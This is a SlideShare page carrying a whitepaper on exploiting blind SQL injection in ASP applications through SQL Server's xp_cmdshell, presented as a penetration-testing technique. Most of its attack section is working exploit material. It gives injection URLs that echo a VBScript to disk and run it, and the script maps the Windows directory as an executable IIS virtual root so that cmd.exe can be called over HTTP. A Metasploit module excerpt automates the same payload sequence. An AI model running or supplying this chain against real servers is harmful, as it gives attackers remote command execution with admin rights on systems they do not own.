SlideShare a Scribd company logo

Blindsql

Ritu Raj
Ritu Raj
Technology
1 of 4
1 Blueinfy’s whitepaper series Blind SQL injection discovery & exploitation technique by Shreeraj Shah Abstract This paper describes technique to deal with blind SQL injection spot with ASP/ASP.NET applications running with access to XP_CMDSHELL. It is possible to perform pen test against this scenario though not having any kind of reverse access or display of error message. It can be used in completely blind environment and successful execution can grant remote command execution on the target application with admin privileges. Keywords Blind SQL injection, SQL injection, XP_CMDSHELL Author Shreeraj Shah, Founder & Director, Blueinfy Solutions Pvt. Ltd. Email : shreeraj@blueinfy.com Blog : http://shreeraj.blogspot.com Profile : http://www.linkedin.com/in/shreeraj http://www.blueinfy.com
2 Blueinfy’s whitepaper series Problem Domain: While performing web application and penetration testing following scenario is very common and it hides potential exploitable SQL injection scenario: 1. We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. 2. Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. 3. Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. 4. We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. 5. If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS. Hence, it is becoming difficult to deal with this kind of situation and identify blind SQL injection spot. Let’s see one of the ways by which you can reach to cmd.exe and bring it out to the web and access over HTTP/HTTPS. This way you can confirm the existence of vulnerability on the target application. Solution: Here is a solution or test one can perform during penetration testing and check the existence of blind “xp_cmdshell”. Step 1: One can echo following lines to file and store it to a filesystem for example say secret.vbs using xp_cmdshell interface. Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo In this particular script we are identifying windir on the fly and setup a virtual root on it with exec permission. We are mapping windows directory and map it to virtual root “secret”, setting execute access on it as well. Following list of commands will create file
3 Blueinfy’s whitepaper series on the server. Here is a way by which we can create file line by line and then execute script on the target machine as well. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ Step 2: Run this file using xp_cmdshell by following command. http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’ This will run file and create /secret/ virtual root on the server. Step 3: Run command over HTTP/HTTPS http://target/secret/system32/cmd.exe?+/c+set Now we have full access to system32 binaries with execution privileges. Here what you get as output. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:Documents and SettingsAll Users CommonProgramFiles=C:Program FilesCommon Files COMPUTERNAME=BLUESQUARE ComSpec=C:WINNTsystem32cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTPS=off HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5 HTTP_CONNECTION=keep-alive HTTP_HOST=localhost HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20040910 HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7 HTTP_KEEP_ALIVE=300 INCLUDE=C:Program FilesMicrosoft Visual Studio .NETFrameworkSDKinclude INSTANCE_ID=1 LIB=C:Program FilesMicrosoft Visual Studio .NETFrameworkSDKLib LOCAL_ADDR=127.0.0.1 NUMBER_OF_PROCES
4 Blueinfy’s whitepaper series It is possible to integrate into any of the exploit framework as well. For example here is we are putting it into Metasploit: sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) .. .. Once we execute it we get following sort of output. Conclusion: The technique described in this paper can help in testing blind SQL injection running with blind xp_cmdshell. It is easy to send few requests and check whether we are getting execution rights on the target application or not, even application is totally blind as described in problem domain.

Recommended

Test automation
Test automationTest automation
Test automationKaushik Banerjee
 
Userpasswrd
UserpasswrdUserpasswrd
Userpasswrdoracle documents
 
Protecting data on device with SQLCipher, Stephen Lombardo
Protecting data on device with SQLCipher, Stephen LombardoProtecting data on device with SQLCipher, Stephen Lombardo
Protecting data on device with SQLCipher, Stephen LombardoXamarin
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
The practice of web application penetration testing
The practice of web application penetration testingThe practice of web application penetration testing
The practice of web application penetration testing_U2_
 
Html Server Anchor Control CS
Html Server Anchor Control CSHtml Server Anchor Control CS
Html Server Anchor Control CSsunmitraeducation
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
 

Recommended

Test automation
Test automationTest automation
Test automationKaushik Banerjee
 
Userpasswrd
UserpasswrdUserpasswrd
Userpasswrdoracle documents
 
Protecting data on device with SQLCipher, Stephen Lombardo
Protecting data on device with SQLCipher, Stephen LombardoProtecting data on device with SQLCipher, Stephen Lombardo
Protecting data on device with SQLCipher, Stephen LombardoXamarin
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
The practice of web application penetration testing
The practice of web application penetration testingThe practice of web application penetration testing
The practice of web application penetration testing_U2_
 
Html Server Anchor Control CS
Html Server Anchor Control CSHtml Server Anchor Control CS
Html Server Anchor Control CSsunmitraeducation
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
 
Randall granlund resume
Randall granlund resumeRandall granlund resume
Randall granlund resumeRandall Granlund
 
Fwa sinbad 2013_11x17
Fwa sinbad 2013_11x17Fwa sinbad 2013_11x17
Fwa sinbad 2013_11x17Anna Fischer
 
PhD Admission Deadlines for 2016
PhD Admission Deadlines for 2016PhD Admission Deadlines for 2016
PhD Admission Deadlines for 2016phd2016
 
Movie Theaters Webinar
Movie Theaters WebinarMovie Theaters Webinar
Movie Theaters WebinarSimplyCast
 
IMG_20151209_0017
IMG_20151209_0017IMG_20151209_0017
IMG_20151209_0017Rosie Ellis
 
Vega International, Morvi, Home Furnishing Tiles
Vega International, Morvi, Home Furnishing TilesVega International, Morvi, Home Furnishing Tiles
Vega International, Morvi, Home Furnishing TilesIndiaMART InterMESH Limited
 
Preparazione materiale web
Preparazione materiale webPreparazione materiale web
Preparazione materiale webalyalethebest
 
Boletín de noticias RIET N° 5 – Octubre 2015
Boletín de noticias RIET N° 5 – Octubre 2015Boletín de noticias RIET N° 5 – Octubre 2015
Boletín de noticias RIET N° 5 – Octubre 2015RIET_INEW
 
steven-talavera new res
steven-talavera new ressteven-talavera new res
steven-talavera new resSteven Talavera
 
Iw world brochure
Iw world brochureIw world brochure
Iw world brochureSimon Williams
 
Introducción a la Programación “Conceptos Básicos”
Introducción a la Programación “Conceptos Básicos”Introducción a la Programación “Conceptos Básicos”
Introducción a la Programación “Conceptos Básicos”Piero Cardenas
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
NoGUI maXbox Starter70
NoGUI maXbox Starter70NoGUI maXbox Starter70
NoGUI maXbox Starter70Max Kleiner
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Web backdoors attacks, evasion, detection
Web backdoors attacks, evasion, detectionWeb backdoors attacks, evasion, detection
Web backdoors attacks, evasion, detectionn|u - The Open Security Community
 
sfdx continuous Integration with Jenkins on aws (Part I)
sfdx continuous Integration with Jenkins on aws (Part I)sfdx continuous Integration with Jenkins on aws (Part I)
sfdx continuous Integration with Jenkins on aws (Part I)Jérémy Vial
 
Exploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version EnglishExploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version Englishchen yuki
 
Prevent hacking
Prevent hackingPrevent hacking
Prevent hackingViswanath Polaki
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 
Website Security
Website SecurityWebsite Security
Website SecurityMODxpo
 

More Related Content

Viewers also liked

Fwa sinbad 2013_11x17
Fwa sinbad 2013_11x17Fwa sinbad 2013_11x17
Fwa sinbad 2013_11x17Anna Fischer
 
PhD Admission Deadlines for 2016
PhD Admission Deadlines for 2016PhD Admission Deadlines for 2016
PhD Admission Deadlines for 2016phd2016
 
Movie Theaters Webinar
Movie Theaters WebinarMovie Theaters Webinar
Movie Theaters WebinarSimplyCast
 
IMG_20151209_0017
IMG_20151209_0017IMG_20151209_0017
IMG_20151209_0017Rosie Ellis
 
Vega International, Morvi, Home Furnishing Tiles
Vega International, Morvi, Home Furnishing TilesVega International, Morvi, Home Furnishing Tiles
Vega International, Morvi, Home Furnishing TilesIndiaMART InterMESH Limited
 
Preparazione materiale web
Preparazione materiale webPreparazione materiale web
Preparazione materiale webalyalethebest
 
Boletín de noticias RIET N° 5 – Octubre 2015
Boletín de noticias RIET N° 5 – Octubre 2015Boletín de noticias RIET N° 5 – Octubre 2015
Boletín de noticias RIET N° 5 – Octubre 2015RIET_INEW
 
Introducción a la Programación “Conceptos Básicos”
Introducción a la Programación “Conceptos Básicos”Introducción a la Programación “Conceptos Básicos”
Introducción a la Programación “Conceptos Básicos”Piero Cardenas
 

Viewers also liked (11)

Randall granlund resume
Randall granlund resumeRandall granlund resume
Randall granlund resume
 
Fwa sinbad 2013_11x17
Fwa sinbad 2013_11x17Fwa sinbad 2013_11x17
Fwa sinbad 2013_11x17
 
PhD Admission Deadlines for 2016
PhD Admission Deadlines for 2016PhD Admission Deadlines for 2016
PhD Admission Deadlines for 2016
 
Movie Theaters Webinar
Movie Theaters WebinarMovie Theaters Webinar
Movie Theaters Webinar
 
IMG_20151209_0017
IMG_20151209_0017IMG_20151209_0017
IMG_20151209_0017
 
Vega International, Morvi, Home Furnishing Tiles
Vega International, Morvi, Home Furnishing TilesVega International, Morvi, Home Furnishing Tiles
Vega International, Morvi, Home Furnishing Tiles
 
Preparazione materiale web
Preparazione materiale webPreparazione materiale web
Preparazione materiale web
 
Boletín de noticias RIET N° 5 – Octubre 2015
Boletín de noticias RIET N° 5 – Octubre 2015Boletín de noticias RIET N° 5 – Octubre 2015
Boletín de noticias RIET N° 5 – Octubre 2015
 
steven-talavera new res
steven-talavera new ressteven-talavera new res
steven-talavera new res
 
Iw world brochure
Iw world brochureIw world brochure
Iw world brochure
 
Introducción a la Programación “Conceptos Básicos”
Introducción a la Programación “Conceptos Básicos”Introducción a la Programación “Conceptos Básicos”
Introducción a la Programación “Conceptos Básicos”
 

Similar to Blindsql

Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesEran Goldstein
 
NoGUI maXbox Starter70
NoGUI maXbox Starter70NoGUI maXbox Starter70
NoGUI maXbox Starter70Max Kleiner
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
sfdx continuous Integration with Jenkins on aws (Part I)
sfdx continuous Integration with Jenkins on aws (Part I)sfdx continuous Integration with Jenkins on aws (Part I)
sfdx continuous Integration with Jenkins on aws (Part I)Jérémy Vial
 
Exploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version EnglishExploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version Englishchen yuki
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wprgster
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 
Website Security
Website SecurityWebsite Security
Website SecurityMODxpo
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Drupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployDrupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployJohn Smith
 
Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!
Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!
Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!Anderson Bassani
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthowaspindia
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.Nelson Gomes
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 

Similar to Blindsql (20)

Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
NoGUI maXbox Starter70
NoGUI maXbox Starter70NoGUI maXbox Starter70
NoGUI maXbox Starter70
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Web backdoors attacks, evasion, detection
Web backdoors attacks, evasion, detectionWeb backdoors attacks, evasion, detection
Web backdoors attacks, evasion, detection
 
sfdx continuous Integration with Jenkins on aws (Part I)
sfdx continuous Integration with Jenkins on aws (Part I)sfdx continuous Integration with Jenkins on aws (Part I)
sfdx continuous Integration with Jenkins on aws (Part I)
 
Exploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version EnglishExploit ie using scriptable active x controls version English
Exploit ie using scriptable active x controls version English
 
Prevent hacking
Prevent hackingPrevent hacking
Prevent hacking
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wpBlack hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
 
Website Security
Website SecurityWebsite Security
Website Security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Drupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - DeployDrupal Continuous Integration with Jenkins - Deploy
Drupal Continuous Integration with Jenkins - Deploy
 
Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!
Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!
Blockchain - Hyperledger Fabric v1.0 Running on LinuxONE, see it in action!
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.Codebits 2012 - Fast relational web site construction.
Codebits 2012 - Fast relational web site construction.
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 

Recently uploaded

How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 

Blindsql

  • 1. 1 Blueinfy’s whitepaper series Blind SQL injection discovery & exploitation technique by Shreeraj Shah Abstract This paper describes technique to deal with blind SQL injection spot with ASP/ASP.NET applications running with access to XP_CMDSHELL. It is possible to perform pen test against this scenario though not having any kind of reverse access or display of error message. It can be used in completely blind environment and successful execution can grant remote command execution on the target application with admin privileges. Keywords Blind SQL injection, SQL injection, XP_CMDSHELL Author Shreeraj Shah, Founder & Director, Blueinfy Solutions Pvt. Ltd. Email : shreeraj@blueinfy.com Blog : http://shreeraj.blogspot.com Profile : http://www.linkedin.com/in/shreeraj http://www.blueinfy.com
  • 2. 2 Blueinfy’s whitepaper series Problem Domain: While performing web application and penetration testing following scenario is very common and it hides potential exploitable SQL injection scenario: 1. We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. 2. Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. 3. Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. 4. We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. 5. If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS. Hence, it is becoming difficult to deal with this kind of situation and identify blind SQL injection spot. Let’s see one of the ways by which you can reach to cmd.exe and bring it out to the web and access over HTTP/HTTPS. This way you can confirm the existence of vulnerability on the target application. Solution: Here is a solution or test one can perform during penetration testing and check the existence of blind “xp_cmdshell”. Step 1: One can echo following lines to file and store it to a filesystem for example say secret.vbs using xp_cmdshell interface. Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo In this particular script we are identifying windir on the fly and setup a virtual root on it with exec permission. We are mapping windows directory and map it to virtual root “secret”, setting execute access on it as well. Following list of commands will create file
